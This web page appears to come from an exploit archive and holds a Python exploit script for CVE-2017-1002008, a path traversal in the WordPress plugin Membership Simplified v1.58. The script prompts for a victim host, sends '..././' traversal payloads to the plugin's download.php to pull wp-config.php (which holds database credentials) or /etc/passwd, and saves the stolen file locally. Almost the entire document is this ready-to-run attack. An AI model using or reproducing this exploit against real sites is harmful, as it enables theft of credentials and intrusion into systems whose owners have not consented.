Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download Discovery: Larry W. Cashdollar Exploit Author: Munir Njiru Website: https://www.alien-within.com CVE-2017-1002008 CWE: 23 Reference URLs: http://www.vapidlabs.com/advisory.php?v=187" print "---------------------------------------------------------------------" victim = raw_input("Please Enter victim host e.g. http://example.com: ") file_choice=raw_input (" Please choose a number representing the file to attack: 1. Wordpress Config 2. Linux Passwd File ") if file_choice == "1": payload="..././..././..././wp-config.php" elif file_choice == "2": payload="..././..././..././..././..././..././..././..././etc/passwd" else: print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit" quit() slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload target=victim+slug def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def checkPlugin(): pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php") pluginExistence = pluginExists.status_code if pluginExistence == 200: print " I can reach the target & it seems vulnerable, I will attempt the exploit Running exploit..." exploit() else: print "Target has a funny code & might not be vulnerable, I will now exit " quit() def exploit(): getThatFile = requests.get(target) fileState = getThatFile.status_code breakApart=urlparse(victim) extract_hostname=breakApart.netloc randomDifferentiator=randomizeFile() cleanName=str(randomDifferentiator) if fileState == 200: respFromThatFile = getThatFile.text if file_choice == "1": resultFile=extract_hostname+"_config_"+cleanName+".txt" print resultFile pwned=open(resultFile, 'w') pwned.write(respFromThatFile) pwned.close print "Wordpress Config Written to "+resultFile else: resultFile=extract_hostname+"_passwd"+cleanName+".txt" pwned=open(resultFile, 'w') pwned.write(respFromThatFile) pwned.close print "Passwd File Written to "+resultFile else: print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: " +fileState if __name__ == "__main__": checkPlugin()</BODY></HTML>